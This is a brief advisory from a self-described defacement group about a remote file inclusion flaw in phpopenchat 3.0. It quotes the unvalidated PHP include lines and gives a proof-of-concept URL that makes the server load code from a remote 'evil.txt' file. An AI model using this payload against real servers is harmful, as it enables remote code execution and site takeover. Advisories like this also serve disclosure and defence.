[W]orld [D]efacers Team --------------------Summary---------------- eVuln ID: WD23 Vendor: phpopenchat-3.0.* Vendor's Web Site: http://phpopenchat.org Class: Remote PoC/Exploit: Available Solution: Not Available Discovered by: rUnViRuS ( wdzone.net & worlddefacers.de ) -----------------Description--------------- include_once("QueryString.php"); include_once("Settings.php"); include_once("$sourcedir/Subs.php"); include_once("$sourcedir/Errors.php"); include_once("$sourcedir/Load.php"); //include_once("$sourcedir/Security.php"); --------------PoC/Exploit---------------------- http://www.host.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://host/evil.txt? --------------Solution--------------------- No Patch available. --------------Credit----------------------- Discovered by: rUnViRuS (worlddefacers.de)
